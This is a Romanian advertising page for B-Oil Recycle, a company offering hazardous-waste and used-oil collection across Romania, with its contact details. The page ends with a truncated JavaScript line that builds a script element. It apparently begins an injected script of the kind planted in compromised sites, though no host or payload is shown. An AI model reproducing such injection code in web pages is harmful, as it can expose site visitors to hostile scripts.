ec278670a88115af46d0065819258c60Pentru un mediu cat mai curat trebuie sa ai grija cum depozitezi deseurile pentru ca acestea sa fie reciclate si valorificate in masura posibilitatilor. Fiecare dintre noi trebuie sa depuna toate eforturile pentru a avea grija de mediul inconjurator. Deseurile periculoase pot fi mai greu de reciclat, insa echipa firmei B-Oil Recycle ofera servicii colectare deseuri periculoase venind astfel in sprijinul persoanelor juridice care detin cantitati mari de astfel de deseuri pe teritoriul tarii. Aceasta echipa va depune toate resursele necesare pentru efectuarea acestor tipuri de operatiuni de colectare deseuri periculoase.

B-Oil Recycle ofera solutii de top in colectarea de deseuri periculoase si nu numai. Cu sediul in Ilfov, serviciile B-Oil Recycle se adreseaza atat persoanelor fizice, cat si celor juridice de pe intreg teritoriul tarii. Datorita impactului negativ pe care il au asupra mediului inconjurator, deseurile periculoase trebuie sa fie adunate in recipiente adecvate si transportate in centrele de specialitate in vederea fie a reciclarii, fie a eliminarii intr-un spatiu controlat. Ai grija de mediul inconjurator si actioneaza in conformitate cu dispozitiile legii apeland la serviciile de colectare oferite de B-Oil Recycle.

Colectare deseuri periculoase – pentru un mediu curat!

Operatiunile de colectare deseuri periculoase implica depozitarea acestor deseuri in recipiente speciale, cu inchidere etansa, urmat fiind de transportul acestora la centrele de specialitate. Compania B-Oil Recycle dispune de intreaga logistica necesara, dar si autorizatiile aferente pentru colectarea deseurilor periculoase in acord cu legislatia aflata in vigoare privind protectia mediului. Aceasta companie detine experienta si toate cunostintele necesare pentru a oferi cele mai profesioniste servicii. Colectarea deseurilor periculoase nu este o optiune, ci obligatorie conform legii de aceea trebuie sa apelezi la aceste servicii oferite de B-Oil Recycle. Siguranta in colectarea deseurilor periculoase este determinata de autorizatiile obtinute de firma in acest sens. Simplu, rapid si in deplina siguranta vei beneficia de aceste servicii cu B-Oil Recycle.

In ceea ce priveste deseurile periculoase este vorba de uleiurile uzate, care pot fi fie sintetice, vegetale si minerale, deseurile petroliere, cum ar fi reziduuri de titei, combustibili si slamuri, dar si alte deseuri asemanatoare care prezinta un grad sporit de poluare pentru mediul inconjurator. Vei avea parte de seriozitate si promptitudine pentru fiecare solicitare, solutii complete, dar si siguranta maxima in efectuarea operatiunilor de colectare, in special pentru cele periculoase.

B-Oil Recycle – o companie cu atitudine!

Societatea B-Oil Recycle activeaza in domeniul reciclarii de multi ani, avand o vasta experienta in acest domeniu. Solutiile oferite sunt eficiente, viabile si complete pentru fiecare in parte in scopul protejarii mediului inconjurator. Fiind autorizata potrivit legii de organele abilitate in domeniu, B-Oil Recycle este un partener pe care te poti baza in cazul in care doresti sa scapi de deseuri intr-un mod responsabil. Serviciile B-Oil Recycle se concentreaza pe colectarea, gestionarea deseurilor si realizarea unor lucrari de ecologizare. Pe langa colectarea deseurilor periculoase, firma se ocupa si de colectarea deseurilor feroase si neferoase, celor electrice si electronice, cat si pentru materiale plastice. Pentru a obtine informatii suplimentare si o oferta de pret contacteaza echipa B-Oil Recycle.

Datele de contact ale firmei B-Oil Recycle

Adresa firmei: Stefanestii de Jos, nr.3

Telefon: 0737 412 840

Email: boil.reciclare@gmail.com

var d=document;var s=d.createElement(‘script’);